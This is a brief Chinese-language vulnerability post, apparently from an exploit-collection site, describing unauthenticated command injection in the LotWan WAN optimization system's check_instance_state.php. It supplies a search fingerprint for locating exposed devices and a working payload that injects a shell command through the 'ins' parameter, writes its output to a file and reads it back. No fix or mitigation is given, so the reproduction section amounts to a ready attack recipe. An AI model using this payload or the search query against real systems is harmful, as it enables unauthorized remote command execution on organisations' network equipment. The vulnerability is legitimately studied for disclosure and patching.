华夏创新 LotWan广域网优化系统 check_instance_state.php 远程命令执行漏洞

漏洞描述

华夏创新 LotWan广域网优化系统check_instance_state.php文件参数 ins存在命令拼接,导致远程命令执行漏洞。

漏洞影响

华夏创新 LotWan广域网优化系统

网络测绘

title=”LotWan 广域网优化系统”

漏洞复现

登录页面

20240327110744164-1635942598942-6671fa50-5052-43f6-ab40-bf2c8403bdf8.cd406953_2024-03-27_11-07-25 (1)

存在漏洞的文件为

/acc/check_instance_state.php?ins=;id>cmd.txt

再访问 /acc/cmd.txt

20240327111137632-1635943074087-b483f989-38e9-43fd-8e94-6de93605d4a7.52694379_2024-03-27_11-11-10 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容